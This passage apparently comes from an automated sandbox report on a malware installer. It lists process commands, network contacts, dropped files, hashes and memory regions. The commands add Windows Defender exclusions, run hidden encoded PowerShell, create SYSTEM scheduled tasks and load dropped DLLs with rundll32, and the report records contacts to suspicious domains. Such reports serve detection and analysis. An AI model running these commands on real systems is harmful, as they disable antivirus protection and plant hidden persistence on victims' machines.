\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "guVLrKgQS" /SC once /ST 02:22:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "guVLrKgQS"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "guVLrKgQS"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 09:43:51 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe\" F0 /LRsite_idZAI 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "aUYdFpynDtMaquqaO"

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe F0 /LRsite_idZAI 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bEcIFlOHxifjjBuFoU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\TzXysB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yozVwwMRZiDXbVH2" /F /xml "C:\Program Files (x86)\orRvbnhdU\QFRhpCj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "UQeOhhowVzyRxe" /F /xml "C:\Program Files (x86)\YrliKKkuhgWU2\OlrFUJF.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "URgAKlFGIJbNQ2" /F /xml "C:\ProgramData\qgjSpVnHOWlNdqVB\SieaGYe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jnXffsNCSkeAQyNEq2" /F /xml "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\gdbQUZn.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KAKzgitjhEJqniBRVYG2" /F /xml "C:\Program Files (x86)\ycfBUKIjHxeOC\TxsIYCe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YGcJOiVocZfwUgdee" /SC once /ST 06:59:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lwSRcZKonRlOofsg\QRdCFhVy\GBDWZzT.dll\",#1 /OSsite_idEhX 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YGcJOiVocZfwUgdee"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\QRdCFhVy\GBDWZzT.dll",#1 /OSsite_idEhX 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\QRdCFhVy\GBDWZzT.dll",#1 /OSsite_idEhX 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YGcJOiVocZfwUgdee"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "aUYdFpynDtMaquqaO"

Network

Country  Destination           Domain                          Proto
N/A      224.0.0.251:5353                                      udp
US       8.8.8.8:53            service-domain.xyz              udp
US       3.80.150.121:443      service-domain.xyz              tcp
US       8.8.8.8:53            121.150.80.3.in-addr.arpa       udp
US       8.8.8.8:53            240.221.184.93.in-addr.arpa     udp
US       8.8.8.8:53            11.97.55.23.in-addr.arpa        udp
US       8.8.8.8:53            171.101.63.23.in-addr.arpa      udp
DE       216.58.206.46:443     clients2.google.com             tcp
DE       142.250.186.65:443    clients2.googleusercontent.com  tcp
DE       216.58.206.46:443     clients2.google.com             tcp
DE       142.250.186.65:443    clients2.googleusercontent.com  tcp
US       44.240.147.44:80      api2.check-data.xyz             tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe

MD5 6248fde83e7929ff0561fd033b68d11c
SHA1 2ad27e8ca39e8717981c1ed451cbddcef1a8334c
SHA256 66959c9da38234dc5a24b2771036a50b47ec531c1bb0cdf7383952c6a6ccb884
SHA512 80bcb48b79563e92880f2d458f4d8f0ea95ba6319054ebc9559b76e108ca76da9d37e259635a1f727084741e2bfb13a9f93c0b5dbe1aaf720d652ea0165a3f33

memory/1476-8-0x0000000000900000-0x0000000000FBE000-memory.dmp

memory/1476-9-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/880-12-0x0000000004F60000-0x0000000004F96000-memory.dmp

memory/880-13-0x00000000735F0000-0x0000000073DA1000-memory.dmp

memory/880-14-0x0000000004F50000-0x0000000004F60000-memory.dmp

memory/880-15-0x00000000055D0000-0x0000000005BFA000-memory.dmp

memory/880-16-0x0000000005550000-0x0000000005572000-memory.dmp

memory/880-17-0x0000000005E30000-0x0000000005E96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4omnbmvu.ait.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/880-23-0x0000000005F10000-0x0000000005F76000-memory.dmp

memory/880-27-0x0000000006040000-0x0000000006397000-memory.dmp

memory/880-28-0x0000000006420000-0x000000000643E000-memory.dmp

memory/880-29-0x00000000064C0000-0x000000000650C000-memory.dmp

memory/880-30-0x0000000004F50000-0x0000000004F60000-memory.dmp

memory/880-33-0x00000000735F0000-0x0000000073DA1000-memory.dmp

memory/2796-38-0x0000000000470000-0x0000000000B2E000-memory.dmp

memory/2796-39-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/1476-42-0x0000000000900000-0x0000000000FBE000-memory.dmp

memory/4812-43-0x00000000735C0000-0x0000000073D71000-memory.dmp

memory/4812-44-0x0000000003910000-0x0000000003920000-memory.dmp

memory/4812-50-0x0000000004870000-0x0000000004BC7000-memory.dmp

memory/4812-54-0x00000000051B0000-0x00000000051FC000-memory.dmp

memory/4812-55-0x0000000003910000-0x0000000003920000-memory.dmp

memory/4812-58-0x00000000735C0000-0x0000000073D71000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 aebf4bf6752c28a76f012ad901a1b27e
SHA1 9609832f721f53d59f2d01b9d740649f44f965ea
SHA256 73316c4c39ce34c44aa26ba504def77616d56f1d7e4a4330ce67a3719ba7b7b4
SHA512 dbf3b971ddcb84a3f5c6b76515a6d9f782fd34d109133cf3b1760596ca1b5bf92e6dd11947b430bba77cfc2ef93f8978d90aaba571d7e299a04e01c96428af50

memory/4408-60-0x00000000735C0000-0x0000000073D71000-memory.dmp

memory/4408-61-0x00000000032F0000-0x0000000003300000-memory.dmp

memory/4408-62-0x00000000032F0000-0x0000000003300000-memory.dmp

memory/4408-71-0x00000000041C0000-0x0000000004517000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d9932abbbf6634c23e37d2355659f3dc
SHA1 e44b31f7988b4ac0a2cd17debe90cd7aca386251
SHA256 e73b1d1d6a19e99e9d8240d49bc1be9c2fa37df88216e1d2499d8c23479e3dde
SHA512 c610338fdc900b6ca8185afb1a47bcf2c0d2e2cd5a457afed0a7ba37a8daae5635651223fa5d186fc9e08aa6104a784af4345a8d6a8a91b63cf1433ca639b93e

memory/4408-74-0x00000000032F0000-0x0000000003300000-memory.dmp

memory/4408-75-0x00000000735C0000-0x0000000073D71000-memory.dmp

memory/4480-78-0x00007FFD46270000-0x00007FFD46D32000-memory.dmp

memory/4480-79-0x00000296AFD90000-0x00000296AFDA0000-memory.dmp

memory/4480-80-0x00000296AFD90000-0x00000296AFDA0000-memory.dmp

memory/4480-89-0x00000296AFD10000-0x00000296AFD32000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c14b4027612bc378d18323c6cb595254
SHA1 be44b1b6918e7d908876a65d8737bd5964912726
SHA256 0d54e2a73a8738ce3ce39c7baacf73045ae8909ef3eec1a8e723c447d4b57ad3
SHA512 f8da0a441cb3c6a3c6fe0e4fbd9830b8a571c924c0d29cdbfc2df6431c8137e52df2470fc13a9b4686e27ef1e44ed1bae00da2faccc372028a201d33e6f6019f

memory/4480-93-0x00007FFD46270000-0x00007FFD46D32000-memory.dmp

memory/2796-94-0x0000000000470000-0x0000000000B2E000-memory.dmp

memory/4252-99-0x0000000000DC0000-0x000000000147E000-memory.dmp

memory/2796-100-0x0000000000470000-0x0000000000B2E000-memory.dmp

memory/4252-101-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/916-113-0x0000000073300000-0x0000000073AB1000-memory.dmp

memory/4252-112-0x0000000003170000-0x00000000031F5000-memory.dmp

memory/916-116-0x0000000003C00000-0x0000000003C10000-memory.dmp

memory/916-114-0x0000000003C00000-0x0000000003C10000-memory.dmp

memory/916-129-0x00000000049C0000-0x0000000004D17000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 26f48603da8d593e816a6ccb40d9ab23
SHA1 b61f4dd069904b81fd43e62c2be93424d56f40da
SHA256 e689d040c3a92d071ab663ac4e120e6b1c043e19901947e3fe5164a60e4d5d96
SHA512 d07161d177422039709764de640cb8183adbe3e5bbc425fcae5afb6a8ceac53f511302383610843f6f1080a30cd4ccd6225d99099acd1ee7ee186be8302823e9

memory/916-149-0x00000000054C0000-0x000000000550C000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 34a0c29ffd77149b3bb23c76eac7750d
SHA1 725a5567f6428fe2195e717bab79a7aeafd2e298
SHA256 a03ed141b2d2c75f169f8c98be1aad625102a8e3e47945e810e4bba154ed21a0
SHA512 f1d127c53e14c9b79cf77b809a3b0087c783c7d9313ca71b432645b2fd7534c4f507a064ca992bef003c7a7fec60307d6ab7e40e1bd2abaad8907a08440cb82c

memory/916-161-0x0000000073300000-0x0000000073AB1000-memory.dmp

memory/916-160-0x0000000003C00000-0x0000000003C10000-memory.dmp

memory/4252-173-0x00000000037F0000-0x0000000003854000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 e648803b818a94993a9b7b9d71cc3fd8
SHA1 4da1ed3e5f6db90f87ec351728b6cce904baf5f0
SHA256 370ebf48ee6f11de009f8d7681a6954856bc8cd8d0f4d4d8415215eda2335b84
SHA512 d7da67de2b93fba4988c5ee043603a9fc82930b18fdfb89e4942fd092ddc0eb33f96eb0497db5f3e1909b2bb3cf7e8d6402e185a0f3293df0cdf2501fad9ba58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\orRvbnhdU\QFRhpCj.xml

MD5 f5ab1bf1d69af3e5b6551e7b0520f057
SHA1 b167f11122aee00f37441414831740409432e843
SHA256 ecd5f8eee3030c92c6b2ce58b19eb458dc4070a51440bbad858aaaf48e8e1ac8
SHA512 d8e7aae92ff9fc9ccdf20d3629dd2e87ee5d3921deb2b34b503e9d241d17f35392d6c5c267acedee827baece4350805cbba767b791b2171032d549eead6c0d92

C:\Program Files (x86)\YrliKKkuhgWU2\OlrFUJF.xml

MD5 9c3ab67a5c2dabf9c5454c3ab30bd5bd
SHA1 39efce22c7e26bbf643b2ee8bf9bd1da9fff58fb
SHA256 c2e7a37ce2ed9e94a8e201ba1c84b4fd56eab1d8f9a0b949bd94bf5cc8c78a2d
SHA512 bb7f515b4063af1c98470a1054c2e65b8a1c22a518676520059f1fe00ea9fe9a32c8a5c64cdc324ad94cdf7aeff86be42fff58b516be66daba28e25b7c2286df

C:\ProgramData\qgjSpVnHOWlNdqVB\SieaGYe.xml

MD5 173f5868755907d0eb191bff13f7d82d
SHA1 2536d876a4abb7dbc7af29cdb9a565629e667f87
SHA256 83ba0b82b631f91fa4e7aefc054caec5d2c49e053a92c38695397d40a1ab0198
SHA512 df53bf4761c48b7ad555cb17ffd65dd9cbf65e50fb0d54311c33075d875d54a0a085e90fcb5619fab8595d10cd575f20fef0cf4235d273120e916889ec1528f1

C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\gdbQUZn.xml

MD5 e44c9587490d4d873c52fc95cc433831
SHA1 d6a4dd361c344d03876d4433ecfc385720164e7f
SHA256 147e76478215c557505f38849b39b0dee60610ad4ce9522dc8f6ee897bbb340a
SHA512 49b2055d5caeab8de86803aa1ab18b9c67570dc9bed97708ea21dab0d1d1b3bb475c5bb4033e32715c125dab2e832b10b72701593c78031a1ed17ab91428cee2

C:\Program Files (x86)\ycfBUKIjHxeOC\TxsIYCe.xml

MD5 d60deb75c4993c72f02c3c88258dad92
SHA1 8abc3e369608ebbb8a70b4f8001b104a09fea440
SHA256 7814437c074b9210812f38248eb30a00117596cb3ace5a1ad29f3dacd49f1df8
SHA512 1d245d836c83463443e1da7dcb1dd87f8dc5e184dc2fb80295ac3a19fe2ba0611bad403bff8757b4e6980c1a3f12da3e98016bda71d7970c708aa61dcf409777

memory/4252-488-0x0000000000DC0000-0x000000000147E000-memory.dmp

memory/4252-492-0x0000000003FD0000-0x0000000004053000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vkmkrhdv.default-release\prefs.js

MD5 a80e66cd2617779e76a04cd840ae043e
SHA1 21eec21df619de67b767d03b242472e68b9b9b86
SHA256 60d90c517ca6fd5331b687cdacc8bf78a4a4feed60ecfd47038062ad8e410f0f
SHA512 a70755223c4b8e7229032fb9f699be53e462720cf1878b52dfe8c620552fa0635abf8f76558839b198dc70696dbbfd97b028860f365b2a9739c4dfcf9e8449f4

memory/4252-506-0x0000000004060000-0x000000000412F000-memory.dmp

C:\Windows\Temp\lwSRcZKonRlOofsg\QRdCFhVy\GBDWZzT.dll

MD5 db0e0228f220bd8fa3b45a0043744456
SHA1 e287442ab5c21cab796c6893a34f0474820b6515
SHA256 9d17deafa6484b95a25345472c61bfbf7c510b4fafd2a52e7806db27ec4a6883
SHA512 a6d1aa8dc12f47ca1b9781264f02a4058287eb3bca0033ec9c3d3bd4adc9e3ac87c6bfcb361dc90ea40c056e0a9f29a28c7454afef5233a11c13c5c40d35f763

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1cc9e59a27d7b2afd4bc1e1f5e637179
SHA1 4b9a3f588a8def95e837ac2db7c0e453d81cb9dc
SHA256 fbccda5a2da5613a2bc730011ac67822f76f17f6823b0cc0ab5f6e43b9850cda
SHA512 9654f61f4934f36f1595acebe0214e972c958c19b047433f7c6f7b32f64e86d7280a9676725ab61549d628581287d88b4a9c2bf57e80f924a5b215f1f8ca898d

memory/1516-533-0x0000000001FB0000-0x0000000002583000-memory.dmp

memory/1476-567-0x0000000000900000-0x0000000000FBE000-memory.dmp

memory/4252-572-0x0000000000DC0000-0x000000000147E000-memory.dmp